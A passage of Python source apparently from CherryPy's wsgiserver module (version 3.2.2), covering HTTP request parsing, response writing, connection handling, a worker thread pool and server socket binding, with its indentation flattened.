# Shamelessly stolen from StringIO
total = 0
lines = []
line = self.readline(sizehint)
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
return lines
def read_trailer_lines(self):
if not self.closed:
raise ValueError(
"Cannot read trailers until the request body has been read.")
while True:
line = self.rfile.readline()
if not line:
# No more data--illegal end of headers
raise ValueError("Illegal end of headers.")
self.bytes_read += len(line)
if self.maxlen and self.bytes_read > self.maxlen:
raise IOError("Request Entity Too Large")
if line == CRLF:
# Normal end of headers
break
if not line.endswith(CRLF):
raise ValueError("HTTP requires CRLF terminators")
yield line
def close(self):
self.rfile.close()
def __iter__(self):
# Shamelessly stolen from StringIO
total = 0
line = self.readline(sizehint)
while line:
yield line
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline(sizehint)
class HTTPRequest(object):
"""An HTTP Request (and response).
A single HTTP connection may consist of multiple request/response pairs.
"""
server = None
"""The HTTPServer object which is receiving this request."""
conn = None
"""The HTTPConnection object on which this request connected."""
inheaders = {}
"""A dict of request headers."""
outheaders = []
"""A list of header tuples to write in the response."""
ready = False
"""When True, the request has been parsed and is ready to begin generating
the response. When False, signals the calling Connection that the response
should not be generated and the connection should close."""
close_connection = False
"""Signals the calling Connection that the request should close. This does
not imply an error! The client and/or server may each request that the
connection be closed."""
chunked_write = False
"""If True, output will be encoded with the "chunked" transfer-coding.
This value is set automatically inside send_headers."""
def __init__(self, server, conn):
self.server= server
self.conn = conn
self.ready = False
self.started_request = False
self.scheme = ntob("http")
if self.server.ssl_adapter is not None:
self.scheme = ntob("https")
# Use the lowest-common protocol in case read_request_line errors.
self.response_protocol = 'HTTP/1.0'
self.inheaders = {}
self.status = ""
self.outheaders = []
self.sent_headers = False
self.close_connection = self.__class__.close_connection
self.chunked_read = False
self.chunked_write = self.__class__.chunked_write
def parse_request(self):
"""Parse the next HTTP request start-line and message-headers."""
self.rfile = SizeCheckWrapper(self.conn.rfile,
self.server.max_request_header_size)
try:
success = self.read_request_line()
except MaxSizeExceeded:
self.simple_response("414 Request-URI Too Long",
"The Request-URI sent with the request exceeds the maximum "
"allowed bytes.")
return
else:
if not success:
return
try:
success = self.read_request_headers()
except MaxSizeExceeded:
self.simple_response("413 Request Entity Too Large",
"The headers sent with the request exceed the maximum "
"allowed bytes.")
return
else:
if not success:
return
self.ready = True
def read_request_line(self):
# HTTP/1.1 connections are persistent by default. If a client
# requests a page, then idles (leaves the connection open),
# then rfile.readline() will raise socket.error("timed out").
# Note that it does this based on the value given to settimeout(),
# and doesn't need the client to request or acknowledge the close
# (although your TCP stack might suffer for it: cf Apache's history
# with FIN_WAIT_2).
request_line = self.rfile.readline()
# Set started_request to True so communicate() knows to send 408
# from here on out.
self.started_request = True
if not request_line:
return False
if request_line == CRLF:
# RFC 2616 sec 4.1: "...if the server is reading the protocol
# stream at the beginning of a message and receives a CRLF
# first, it should ignore the CRLF."
# But only ignore one leading line! else we enable a DoS.
request_line = self.rfile.readline()
if not request_line:
return False
if not request_line.endswith(CRLF):
self.simple_response("400 Bad Request", "HTTP requires CRLF terminators")
return False
try:
method, uri, req_protocol = request_line.strip().split(SPACE, 2)
# The [x:y] slicing is necessary for byte strings to avoid getting ord's
rp = int(req_protocol[5:6]), int(req_protocol[7:8])
except ValueError:
self.simple_response("400 Bad Request", "Malformed Request-Line")
return False
self.uri = uri
self.method = method
# uri may be an abs_path (including "http://host.domain.tld");
scheme, authority, path = self.parse_request_uri(uri)
if NUMBER_SIGN in path:
self.simple_response("400 Bad Request",
"Illegal #fragment in Request-URI.")
return False
if scheme:
self.scheme = scheme
qs = EMPTY
if QUESTION_MARK in path:
path, qs = path.split(QUESTION_MARK, 1)
# Unquote the path+params (e.g. "/this%20path" -> "/this path").
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec5.html#sec5.1.2
#
# But note that "...a URI must be separated into its components
# before the escaped characters within those components can be
# safely decoded." http://www.ietf.org/rfc/rfc2396.txt, sec 2.4.2
# Therefore, "/this%2Fpath" becomes "/this%2Fpath", not "/this/path".
try:
atoms = [self.unquote_bytes(x) for x in quoted_slash.split(path)]
except ValueError:
ex = sys.exc_info()[1]
self.simple_response("400 Bad Request", ex.args[0])
return False
path = b"%2F".join(atoms)
self.path = path
# Note that, like wsgiref and most other HTTP servers,
# we "% HEX HEX"-unquote the path but not the query string.
self.qs = qs
# Compare request and server HTTP protocol versions, in case our
# server does not support the requested protocol. Limit our output
# to min(req, server). We want the following output:
# request server actual written supported response
# protocol protocol response protocol feature set
# a 1.0 1.0 1.0 1.0
# b 1.0 1.1 1.1 1.0
# c 1.1 1.0 1.0 1.0
# d 1.1 1.1 1.1 1.1
# Notice that, in (b), the response will be "HTTP/1.1" even though
# the client only understands 1.0. RFC 2616 10.5.6 says we should
# only return 505 if the _major_ version is different.
# The [x:y] slicing is necessary for byte strings to avoid getting ord's
sp = int(self.server.protocol[5:6]), int(self.server.protocol[7:8])
if sp[0] != rp[0]:
self.simple_response("505 HTTP Version Not Supported")
return False
self.request_protocol = req_protocol
self.response_protocol = "HTTP/%s.%s" % min(rp, sp)
return True
def read_request_headers(self):
"""Read self.rfile into self.inheaders. Return success."""
# then all the http headers
try:
read_headers(self.rfile, self.inheaders)
except ValueError:
ex = sys.exc_info()[1]
self.simple_response("400 Bad Request", ex.args[0])
return False
mrbs = self.server.max_request_body_size
if mrbs and int(self.inheaders.get(b"Content-Length", 0)) > mrbs:
self.simple_response("413 Request Entity Too Large",
"The entity sent with the request exceeds the maximum "
"allowed bytes.")
return False
# Persistent connection support
if self.response_protocol == "HTTP/1.1":
# Both server and client are HTTP/1.1
if self.inheaders.get(b"Connection", b"") == b"close":
self.close_connection = True
else:
# Either the server or client (or both) are HTTP/1.0
if self.inheaders.get(b"Connection", b"") != b"Keep-Alive":
self.close_connection = True
# Transfer-Encoding support
te = None
if self.response_protocol == "HTTP/1.1":
te = self.inheaders.get(b"Transfer-Encoding")
if te:
te = [x.strip().lower() for x in te.split(b",") if x.strip()]
self.chunked_read = False
if te:
for enc in te:
if enc == b"chunked":
self.chunked_read = True
else:
# Note that, even if we see "chunked", we must reject
# if there is an extension we don't recognize.
self.simple_response("501 Unimplemented")
self.close_connection = True
return False
# From PEP 333:
# "Servers and gateways that implement HTTP 1.1 must provide
# transparent support for HTTP 1.1's "expect/continue" mechanism.
# This may be done in any of several ways:
# 1. Respond to requests containing an Expect: 100-continue request
# with an immediate "100 Continue" response, and proceed normally.
# 2. Proceed with the request normally, but provide the application
# with a wsgi.input stream that will send the "100 Continue"
# response if/when the application first attempts to read from
# the input stream. The read request must then remain blocked
# until the client responds.
# 3. Wait until the client decides that the server does not support
# expect/continue, and sends the request body on its own.
# (This is suboptimal, and is not recommended.)
#
# We used to do 3, but are now doing 1. Maybe we'll do 2 someday,
# but it seems like it would be a big slowdown for such a rare case.
if self.inheaders.get(b"Expect", b"") == b"100-continue":
# Don't use simple_response here, because it emits headers
# we don't want. See http://www.cherrypy.org/ticket/951
msg = self.server.protocol.encode('ascii') + b" 100 Continue\r\n\r\n"
try:
self.conn.wfile.write(msg)
except socket.error:
x = sys.exc_info()[1]
if x.args[0] not in socket_errors_to_ignore:
raise
return True
def parse_request_uri(self, uri):
"""Parse a Request-URI into (scheme, authority, path).
Note that Request-URI's must be one of::
Request-URI = "*" | absoluteURI | abs_path | authority
Therefore, a Request-URI which starts with a double forward-slash
cannot be a "net_path"::
net_path = "//" authority [ abs_path ]
Instead, it must be interpreted as an "abs_path" with an empty first
path segment::
abs_path = "/" path_segments
path_segments = segment *( "/" segment )
segment = *pchar *( ";" param )
param = *pchar
"""
if uri == ASTERISK:
return None, None, uri
scheme, sep, remainder = uri.partition(b'://')
if sep and QUESTION_MARK not in scheme:
# An absoluteURI.
# If there's a scheme (and it must be http or https), then:
# http_URL = "http:" "//" host [ ":" port ] [ abs_path [ "?" query ]]
authority, path_a, path_b = remainder.partition(FORWARD_SLASH)
return scheme.lower(), authority, path_a+path_b
if uri.startswith(FORWARD_SLASH):
# An abs_path.
return None, None, uri
else:
# An authority.
return None, uri, None
def unquote_bytes(self, path):
"""takes quoted string and unquotes % encoded values"""
res = path.split(b'%')
for i in range(1, len(res)):
item = res[i]
try:
res[i] = bytes([int(item[:2], 16)]) + item[2:]
except ValueError:
raise
return b''.join(res)
def respond(self):
"""Call the gateway and write its iterable output."""
mrbs = self.server.max_request_body_size
if self.chunked_read:
self.rfile = ChunkedRFile(self.conn.rfile, mrbs)
else:
cl = int(self.inheaders.get(b"Content-Length", 0))
if mrbs and mrbs < cl:
if not self.sent_headers:
self.simple_response("413 Request Entity Too Large",
"The entity sent with the request exceeds the maximum "
"allowed bytes.")
return
self.rfile = KnownLengthRFile(self.conn.rfile, cl)
self.server.gateway(self).respond()
if (self.ready and not self.sent_headers):
self.sent_headers = True
self.send_headers()
if self.chunked_write:
self.conn.wfile.write(b"0\r\n\r\n")
def simple_response(self, status, msg=""):
"""Write a simple response back to the client."""
status = str(status)
buf = [bytes(self.server.protocol, "ascii") + SPACE +
bytes(status, "ISO-8859-1") + CRLF,
bytes("Content-Length: %s\r\n" % len(msg), "ISO-8859-1"),
b"Content-Type: text/plain\r\n"]
if status[:3] in ("413", "414"):
# Request Entity Too Large / Request-URI Too Long
self.close_connection = True
if self.response_protocol == 'HTTP/1.1':
# This will not be true for 414, since read_request_line
# usually raises 414 before reading the whole line, and we
# therefore cannot know the proper response_protocol.
buf.append(b"Connection: close\r\n")
else:
# HTTP/1.0 had no 413/414 status nor Connection header.
# Emit 400 instead and trust the message body is enough.
status = "400 Bad Request"
buf.append(CRLF)
if msg:
if isinstance(msg, unicodestr):
msg = msg.encode("ISO-8859-1")
buf.append(msg)
try:
self.conn.wfile.write(b"".join(buf))
except socket.error:
x = sys.exc_info()[1]
if x.args[0] not in socket_errors_to_ignore:
raise
def write(self, chunk):
"""Write unbuffered data to the client."""
if self.chunked_write and chunk:
buf = [bytes(hex(len(chunk)), 'ASCII')[2:], CRLF, chunk, CRLF]
self.conn.wfile.write(EMPTY.join(buf))
else:
self.conn.wfile.write(chunk)
def send_headers(self):
"""Assert, process, and send the HTTP response message-headers.
You must set self.status, and self.outheaders before calling this.
"""
hkeys = [key.lower() for key, value in self.outheaders]
status = int(self.status[:3])
if status == 413:
# Request Entity Too Large. Close conn to avoid garbage.
self.close_connection = True
elif b"content-length" not in hkeys:
# "All 1xx (informational), 204 (no content),
# and 304 (not modified) responses MUST NOT
# include a message-body." So no point chunking.
if status < 200 or status in (204, 205, 304):
pass
else:
if (self.response_protocol == 'HTTP/1.1'
and self.method != b'HEAD'):
# Use the chunked transfer-coding
self.chunked_write = True
self.outheaders.append((b"Transfer-Encoding", b"chunked"))
else:
# Closing the conn is the only way to determine len.
self.close_connection = True
if b"connection" not in hkeys:
if self.response_protocol == 'HTTP/1.1':
# Both server and client are HTTP/1.1 or better
if self.close_connection:
self.outheaders.append((b"Connection", b"close"))
else:
# Server and/or client are HTTP/1.0
if not self.close_connection:
self.outheaders.append((b"Connection", b"Keep-Alive"))
if (not self.close_connection) and (not self.chunked_read):
# Read any remaining request body data on the socket.
# "If an origin server receives a request that does not include an
# Expect request-header field with the "100-continue" expectation,
# the request includes a request body, and the server responds
# with a final status code before reading the entire request body
# from the transport connection, then the server SHOULD NOT close
# the transport connection until it has read the entire request,
# or until the client closes the connection. Otherwise, the client
# might not reliably receive the response message. However, this
# requirement is not be construed as preventing a server from
# defending itself against denial-of-service attacks, or from
# badly broken client implementations."
remaining = getattr(self.rfile, 'remaining', 0)
if remaining > 0:
self.rfile.read(remaining)
if b"date" not in hkeys:
self.outheaders.append(
(b"Date", email.utils.formatdate(usegmt=True).encode('ISO-8859-1')))
if b"server" not in hkeys:
self.outheaders.append(
(b"Server", self.server.server_name.encode('ISO-8859-1')))
buf = [self.server.protocol.encode('ascii') + SPACE + self.status + CRLF]
for k, v in self.outheaders:
buf.append(k + COLON + SPACE + v + CRLF)
buf.append(CRLF)
self.conn.wfile.write(EMPTY.join(buf))
class NoSSLError(Exception):
"""Exception raised when a client speaks HTTP to an HTTPS socket."""
pass
class FatalSSLAlert(Exception):
"""Exception raised when the SSL implementation signals a fatal alert."""
pass
class CP_BufferedWriter(io.BufferedWriter):
"""Faux file object attached to a socket object."""
def write(self, b):
self._checkClosed()
if isinstance(b, str):
raise TypeError("can't write str to binary stream")
with self._write_lock:
self._write_buf.extend(b)
self._flush_unlocked()
return len(b)
def _flush_unlocked(self):
self._checkClosed("flush of closed file")
while self._write_buf:
try:
# ssl sockets only except 'bytes', not bytearrays
# so perhaps we should conditionally wrap this for perf?
n = self.raw.write(bytes(self._write_buf))
except io.BlockingIOError as e:
n = e.characters_written
del self._write_buf[:n]
def CP_makefile(sock, mode='r', bufsize=DEFAULT_BUFFER_SIZE):
if 'r' in mode:
return io.BufferedReader(socket.SocketIO(sock, mode), bufsize)
else:
return CP_BufferedWriter(socket.SocketIO(sock, mode), bufsize)
class HTTPConnection(object):
"""An HTTP connection (active socket).
server: the Server object which received this connection.
socket: the raw socket object (usually TCP) for this connection.
makefile: a fileobject class for reading from the socket.
"""
remote_addr = None
remote_port = None
ssl_env = None
rbufsize = DEFAULT_BUFFER_SIZE
wbufsize = DEFAULT_BUFFER_SIZE
RequestHandlerClass = HTTPRequest
def __init__(self, server, sock, makefile=CP_makefile):
self.server = server
self.socket = sock
self.rfile = makefile(sock, "rb", self.rbufsize)
self.wfile = makefile(sock, "wb", self.wbufsize)
self.requests_seen = 0
def communicate(self):
"""Read each request and respond appropriately."""
request_seen = False
try:
while True:
# (re)set req to None so that if something goes wrong in
# the RequestHandlerClass constructor, the error doesn't
# get written to the previous request.
req = None
req = self.RequestHandlerClass(self.server, self)
# This order of operations should guarantee correct pipelining.
req.parse_request()
if self.server.stats['Enabled']:
self.requests_seen += 1
if not req.ready:
# Something went wrong in the parsing (and the server has
# probably already made a simple_response). Return and
# let the conn close.
return
request_seen = True
req.respond()
if req.close_connection:
return
except socket.error:
e = sys.exc_info()[1]
errnum = e.args[0]
# sadly SSL sockets return a different (longer) time out string
if errnum == 'timed out' or errnum == 'The read operation timed out':
# Don't error if we're between requests; only error
# if 1) no request has been started at all, or 2) we're
# in the middle of a request.
# See http://www.cherrypy.org/ticket/853
if (not request_seen) or (req and req.started_request):
# Don't bother writing the 408 if the response
# has already started being written.
if req and not req.sent_headers:
try:
req.simple_response("408 Request Timeout")
except FatalSSLAlert:
# Close the connection.
return
elif errnum not in socket_errors_to_ignore:
self.server.error_log("socket.error %s" % repr(errnum),
level=logging.WARNING, traceback=True)
if req and not req.sent_headers:
try:
req.simple_response("500 Internal Server Error")
except FatalSSLAlert:
# Close the connection.
return
return
except (KeyboardInterrupt, SystemExit):
raise
except FatalSSLAlert:
# Close the connection.
return
except NoSSLError:
if req and not req.sent_headers:
# Unwrap our wfile
self.wfile = CP_makefile(self.socket._sock, "wb", self.wbufsize)
req.simple_response("400 Bad Request",
"The client sent a plain HTTP request, but "
"this server only speaks HTTPS on this port.")
self.linger = True
except Exception:
e = sys.exc_info()[1]
self.server.error_log(repr(e), level=logging.ERROR, traceback=True)
if req and not req.sent_headers:
try:
req.simple_response("500 Internal Server Error")
except FatalSSLAlert:
# Close the connection.
return
linger = False
def close(self):
"""Close the socket underlying this connection."""
self.rfile.close()
if not self.linger:
# Python's socket module does NOT call close on the kernel socket
# when you call socket.close(). We do so manually here because we
# want this server to send a FIN TCP segment immediately. Note this
# must be called *before* calling socket.close(), because the latter
# drops its reference to the kernel socket.
# Python 3 *probably* fixed this with socket._real_close; hard to tell.
## self.socket._sock.close()
self.socket.close()
else:
# On the other hand, sometimes we want to hang around for a bit
# to make sure the client has a chance to read our entire
# response. Skipping the close() calls here delays the FIN
# packet until the socket object is garbage-collected later.
# Someday, perhaps, we'll do the full lingering_close that
# Apache does, but not today.
pass
class TrueyZero(object):
"""An object which equals and does math like the integer '0' but evals True."""
def __add__(self, other):
return other
def __radd__(self, other):
return other
trueyzero = TrueyZero()
_SHUTDOWNREQUEST = None
class WorkerThread(threading.Thread):
"""Thread which continuously polls a Queue for Connection objects.
Due to the timing issues of polling a Queue, a WorkerThread does not
check its own 'ready' flag after it has started. To stop the thread,
it is necessary to stick a _SHUTDOWNREQUEST object onto the Queue
(one for each running WorkerThread).
"""
conn = None
"""The current connection pulled off the Queue, or None."""
server = None
"""The HTTP Server which spawned this thread, and which owns the
Queue and is placing active connections into it."""
ready = False
"""A simple flag for the calling server to know when this thread
has begun polling the Queue."""
def __init__(self, server):
self.ready = False
self.server = server
self.requests_seen = 0
self.bytes_read = 0
self.bytes_written = 0
self.start_time = None
self.work_time = 0
self.stats = {
'Requests': lambda s: self.requests_seen + ((self.start_time is None) and trueyzero or self.conn.requests_seen),
'Bytes Read': lambda s: self.bytes_read + ((self.start_time is None) and trueyzero or self.conn.rfile.bytes_read),
'Bytes Written': lambda s: self.bytes_written + ((self.start_time is None) and trueyzero or self.conn.wfile.bytes_written),
'Work Time': lambda s: self.work_time + ((self.start_time is None) and trueyzero or time.time() - self.start_time),
'Read Throughput': lambda s: s['Bytes Read'](s) / (s['Work Time'](s) or 1e-6),
'Write Throughput': lambda s: s['Bytes Written'](s) / (s['Work Time'](s) or 1e-6),
}
threading.Thread.__init__(self)
def run(self):
self.server.stats['Worker Threads'][self.getName()] = self.stats
try:
self.ready = True
while True:
conn = self.server.requests.get()
if conn is _SHUTDOWNREQUEST:
return
self.conn = conn
if self.server.stats['Enabled']:
self.start_time = time.time()
try:
conn.communicate()
finally:
conn.close()
if self.server.stats['Enabled']:
self.requests_seen += self.conn.requests_seen
self.bytes_read += self.conn.rfile.bytes_read
self.bytes_written += self.conn.wfile.bytes_written
self.work_time += time.time() - self.start_time
self.start_time = None
self.conn = None
except (KeyboardInterrupt, SystemExit):
exc = sys.exc_info()[1]
self.server.interrupt = exc
class ThreadPool(object):
"""A Request Queue for an HTTPServer which pools threads.
ThreadPool objects must provide min, get(), put(obj), start()
and stop(timeout) attributes.
"""
def __init__(self, server, min=10, max=-1):
self.server = server
self.min = min
self.max = max
self._threads = []
self._queue = queue.Queue()
self.get = self._queue.get
def start(self):
"""Start the pool of threads."""
for i in range(self.min):
self._threads.append(WorkerThread(self.server))
for worker in self._threads:
worker.setName("CP Server " + worker.getName())
worker.start()
for worker in self._threads:
while not worker.ready:
time.sleep(.1)
def _get_idle(self):
"""Number of worker threads which are idle. Read-only."""
return len([t for t in self._threads if t.conn is None])
idle = property(_get_idle, doc=_get_idle.__doc__)
def put(self, obj):
self._queue.put(obj)
if obj is _SHUTDOWNREQUEST:
return
def grow(self, amount):
"""Spawn new worker threads (not above self.max)."""
for i in range(amount):
if self.max > 0 and len(self._threads) >= self.max:
break
worker = WorkerThread(self.server)
worker.setName("CP Server " + worker.getName())
self._threads.append(worker)
worker.start()
def shrink(self, amount):
"""Kill off worker threads (not below self.min)."""
# Grow/shrink the pool if necessary.
# Remove any dead threads from our list
for t in self._threads:
if not t.isAlive():
self._threads.remove(t)
amount -= 1
if amount > 0:
for i in range(min(amount, len(self._threads) - self.min)):
# Put a number of shutdown requests on the queue equal
# to 'amount'. Once each of those is processed by a worker,
# that worker will terminate and be culled from our list
# in self.put.
self._queue.put(_SHUTDOWNREQUEST)
def stop(self, timeout=5):
# Must shut down threads here so the code that calls
# this method can know when all threads are stopped.
for worker in self._threads:
self._queue.put(_SHUTDOWNREQUEST)
# Don't join currentThread (when stop is called inside a request).
current = threading.currentThread()
if timeout and timeout >= 0:
endtime = time.time() + timeout
while self._threads:
worker = self._threads.pop()
if worker is not current and worker.isAlive():
try:
if timeout is None or timeout < 0:
worker.join()
else:
remaining_time = endtime - time.time()
if remaining_time > 0:
worker.join(remaining_time)
if worker.isAlive():
# We exhausted the timeout.
# Forcibly shut down the socket.
c = worker.conn
if c and not c.rfile.closed:
try:
c.socket.shutdown(socket.SHUT_RD)
except TypeError:
# pyOpenSSL sockets don't take an arg
c.socket.shutdown()
worker.join()
except (AssertionError,
# Ignore repeated Ctrl-C.
# See http://www.cherrypy.org/ticket/691.
KeyboardInterrupt):
pass
def _get_qsize(self):
return self._queue.qsize()
qsize = property(_get_qsize)
try:
import fcntl
except ImportError:
try:
from ctypes import windll, WinError
except ImportError:
def prevent_socket_inheritance(sock):
"""Dummy function, since neither fcntl nor ctypes are available."""
pass
else:
def prevent_socket_inheritance(sock):
"""Mark the given socket fd as non-inheritable (Windows)."""
if not windll.kernel32.SetHandleInformation(sock.fileno(), 1, 0):
raise WinError()
else:
def prevent_socket_inheritance(sock):
"""Mark the given socket fd as non-inheritable (POSIX)."""
fd = sock.fileno()
old_flags = fcntl.fcntl(fd, fcntl.F_GETFD)
fcntl.fcntl(fd, fcntl.F_SETFD, old_flags | fcntl.FD_CLOEXEC)
class SSLAdapter(object):
"""Base class for SSL driver library adapters.
Required methods:
* ``wrap(sock) -> (wrapped socket, ssl environ dict)``
* ``makefile(sock, mode='r', bufsize=DEFAULT_BUFFER_SIZE) -> socket file object``
"""
def __init__(self, certificate, private_key, certificate_chain=None):
self.certificate = certificate
self.private_key = private_key
self.certificate_chain = certificate_chain
def wrap(self, sock):
raise NotImplemented
def makefile(self, sock, mode='r', bufsize=DEFAULT_BUFFER_SIZE):
raise NotImplemented
class HTTPServer(object):
"""An HTTP server."""
_bind_addr = "127.0.0.1"
_interrupt = None
gateway = None
"""A Gateway instance."""
minthreads = None
"""The minimum number of worker threads to create (default 10)."""
maxthreads = None
"""The maximum number of worker threads to create (default -1 = no limit)."""
server_name = None
"""The name of the server; defaults to socket.gethostname()."""
protocol = "HTTP/1.1"
"""The version string to write in the Status-Line of all HTTP responses.
For example, "HTTP/1.1" is the default. This also limits the supported
features used in the response."""
request_queue_size = 5
"""The 'backlog' arg to socket.listen(); max queued connections (default 5)."""
shutdown_timeout = 5
"""The total time, in seconds, to wait for worker threads to cleanly exit."""
timeout = 10
"""The timeout in seconds for accepted connections (default 10)."""
version = "CherryPy/3.2.2"
"""A version string for the HTTPServer."""
software = None
"""The value to set for the SERVER_SOFTWARE entry in the WSGI environ.
If None, this defaults to ``'%s Server' % self.version``."""
ready = False
"""An internal flag which marks whether the socket is accepting connections."""
max_request_header_size = 0
"""The maximum size, in bytes, for request headers, or 0 for no limit."""
max_request_body_size = 0
"""The maximum size, in bytes, for request bodies, or 0 for no limit."""
nodelay = True
"""If True (the default since 3.1), sets the TCP_NODELAY socket option."""
ConnectionClass = HTTPConnection
"""The class to use for handling HTTP connections."""
ssl_adapter = None
"""An instance of SSLAdapter (or a subclass).
You must have the corresponding SSL driver library installed."""
def __init__(self, bind_addr, gateway, minthreads=10, maxthreads=-1,
server_name=None):
self.bind_addr = bind_addr
self.gateway = gateway
self.requests = ThreadPool(self, min=minthreads or 1, max=maxthreads)
if not server_name:
server_name = socket.gethostname()
self.server_name = server_name
self.clear_stats()
def clear_stats(self):
self._start_time = None
self._run_time = 0
self.stats = {
'Enabled': False,
'Bind Address': lambda s: repr(self.bind_addr),
'Run time': lambda s: (not s['Enabled']) and -1 or self.runtime(),
'Accepts': 0,
'Accepts/sec': lambda s: s['Accepts'] / self.runtime(),
'Queue': lambda s: getattr(self.requests, "qsize", None),
'Threads': lambda s: len(getattr(self.requests, "_threads", [])),
'Threads Idle': lambda s: getattr(self.requests, "idle", None),
'Socket Errors': 0,
'Requests': lambda s: (not s['Enabled']) and -1 or sum([w['Requests'](w) for w
in s['Worker Threads'].values()], 0),
'Bytes Read': lambda s: (not s['Enabled']) and -1 or sum([w['Bytes Read'](w) for w
in s['Worker Threads'].values()], 0),
'Bytes Written': lambda s: (not s['Enabled']) and -1 or sum([w['Bytes Written'](w) for w
in s['Worker Threads'].values()], 0),
'Work Time': lambda s: (not s['Enabled']) and -1 or sum([w['Work Time'](w) for w
in s['Worker Threads'].values()], 0),
'Read Throughput': lambda s: (not s['Enabled']) and -1 or sum(
[w['Bytes Read'](w) / (w['Work Time'](w) or 1e-6)
for w in s['Worker Threads'].values()], 0),
'Write Throughput': lambda s: (not s['Enabled']) and -1 or sum(
[w['Bytes Written'](w) / (w['Work Time'](w) or 1e-6)
for w in s['Worker Threads'].values()], 0),
'Worker Threads': {},
}
logging.statistics["CherryPy HTTPServer %d" % id(self)] = self.stats
def runtime(self):
if self._start_time is None:
return self._run_time
else:
return self._run_time + (time.time() - self._start_time)
def __str__(self):
return "%s.%s(%r)" % (self.__module__, self.__class__.__name__,
self.bind_addr)
def _get_bind_addr(self):
return self._bind_addr
def _set_bind_addr(self, value):
if isinstance(value, tuple) and value[0] in ('', None):
# Despite the socket module docs, using '' does not
# allow AI_PASSIVE to work. Passing None instead
# returns '0.0.0.0' like we want. In other words:
# host AI_PASSIVE result
# '' Y 192.168.x.y
# '' N 192.168.x.y
# None Y 0.0.0.0
# None N 127.0.0.1
# But since you can get the same effect with an explicit
# '0.0.0.0', we deny both the empty string and None as values.
raise ValueError("Host values of '' or None are not allowed. "
"Use '0.0.0.0' (IPv4) or '::' (IPv6) instead "
"to listen on all active interfaces.")
self._bind_addr = value
bind_addr = property(_get_bind_addr, _set_bind_addr,
doc="""The interface on which to listen for connections.
For TCP sockets, a (host, port) tuple. Host values may be any IPv4
or IPv6 address, or any valid hostname. The string 'localhost' is a
synonym for '127.0.0.1' (or '::1', if your hosts file prefers IPv6).
The string '0.0.0.0' is a special IPv4 entry meaning "any active
interface" (INADDR_ANY), and '::' is the similar IN6ADDR_ANY for
IPv6. The empty string or None are not allowed.
For UNIX sockets, supply the filename as a string.""")
def start(self):
"""Run the server forever."""
# We don't have to trap KeyboardInterrupt or SystemExit here,
# because cherrpy.server already does so, calling self.stop() for us.
# If you're using this server with another framework, you should
# trap those exceptions in whatever code block calls start().
self._interrupt = None
if self.software is None:
self.software = "%s Server" % self.version
# Select the appropriate socket
if isinstance(self.bind_addr, basestring):
# AF_UNIX socket
# So we can reuse the socket...
try: os.unlink(self.bind_addr)
except: pass
# So everyone can access the socket...
try: os.chmod(self.bind_addr, 511) # 0777
except: pass
info = [(socket.AF_UNIX, socket.SOCK_STREAM, 0, "", self.bind_addr)]
else:
# AF_INET or AF_INET6 socket
# Get the correct address family for our host (allows IPv6 addresses)
host, port = self.bind_addr
try:
info = socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM, 0, socket.AI_PASSIVE)
except socket.gaierror:
if ':' in self.bind_addr[0]:
info = [(socket.AF_INET6, socket.SOCK_STREAM,
0, "", self.bind_addr + (0, 0))]
else:
info = [(socket.AF_INET, socket.SOCK_STREAM,
0, "", self.bind_addr)]
self.socket = None
msg = "No socket could be created"
for res in info:
af, socktype, proto, canonname, sa = res
try:
self.bind(af, socktype, proto)
except socket.error:
if self.socket:
self.socket.close()
self.socket = None
continue
break
if not self.socket:
raise socket.error(msg)
# Timeout so KeyboardInterrupt can be caught on Win32
self.socket.settimeout(1)
self.socket.listen(self.request_queue_size)
# Create worker threads
self.requests.start()
self.ready = True
self._start_time = time.time()
while self.ready:
try:
self.tick()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.error_log("Error in HTTPServer.tick", level=logging.ERROR,
traceback=True)
if self.interrupt:
while self.interrupt is True:
# Wait for self.stop() to complete. See _set_interrupt.
time.sleep(0.1)
if self.interrupt:
raise self.interrupt
def error_log(self, msg="", level=20, traceback=False):
# Override this in subclasses as desired
sys.stderr.write(msg + '\n')
sys.stderr.flush()
if traceback:
tblines = format_exc()
sys.stderr.write(tblines)
sys.stderr.flush()
def bind(self, family, type, proto=0):
"""Create (or recreate) the actual socket object."""
self.socket = socket.socket(family, type, proto)
prevent_socket_inheritance(self.socket)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if self.nodelay and not isinstance(self.bind_addr, str):
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if self.ssl_adapter is not None:
self.socket = self.ssl_adapter.bind(self.socket)
# If listening on the IPV6 any address ('::' = IN6ADDR_ANY),
# activate dual-stack. See http://www.cherrypy.org/ticket/871.
if (hasattr(socket, 'AF_INET6') and family == socket.AF_INET6
and self.bind_addr[0] in ('::', '::0', '::0.0.0.0')):
try:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except (AttributeError, socket.error):
# Apparently, the socket option is not available in
# this machine's TCP stack
pass
self.socket.bind(self.bind_addr)
def tick(self):
"""Accept a new connection and put it on the Queue."""
try:
s, addr = self.socket.accept()
if self.stats['Enabled']:
self.stats['Accepts'] += 1
if not self.ready:
return
prevent_socket_inheritance(s)
if hasattr(s, 'settimeout'):
s.settimeout(self.timeout)
makefile = CP_makefile
ssl_env = {}
# if ssl cert and key are set, we try to be a secure HTTP server
if self.ssl_adapter is not None:
try:
s, ssl_env = self.ssl_adapter.wrap(s)
except NoSSLError:
msg = ("The client sent a plain HTTP request, but "
"this server only speaks HTTPS on this port.")
buf = ["%s 400 Bad Request\r\n" % self.protocol,
"Content-Length: %s\r\n" % len(msg),
"Content-Type: text/plain\r\n\r\n",
msg]
wfile = makefile(s, "wb", DEFAULT_BUFFER_SIZE)
try:
wfile.write("".join(buf).encode('ISO-8859-1'))
except socket.error:
x = sys.exc_info()[1]
if x.args[0] not in socket_errors_to_ignore:
raise
return
if not s:
return
makefile = self.ssl_adapter.makefile
# Re-apply our timeout since we may have a new socket object
if hasattr(s, 'settimeout'):
s.settimeout(self.timeout)
conn = self.ConnectionClass(self, s, makefile)
if not isinstance(self.bind_addr, basestring):
# optional values
# Until we do DNS lookups, omit REMOTE_HOST
if addr is None: # sometimes this can happen
# figure out if AF_INET or AF_INET6.
if len(s.getsockname()) == 2:
# AF_INET
addr = ('0.0.0.0', 0)
else:
# AF_INET6
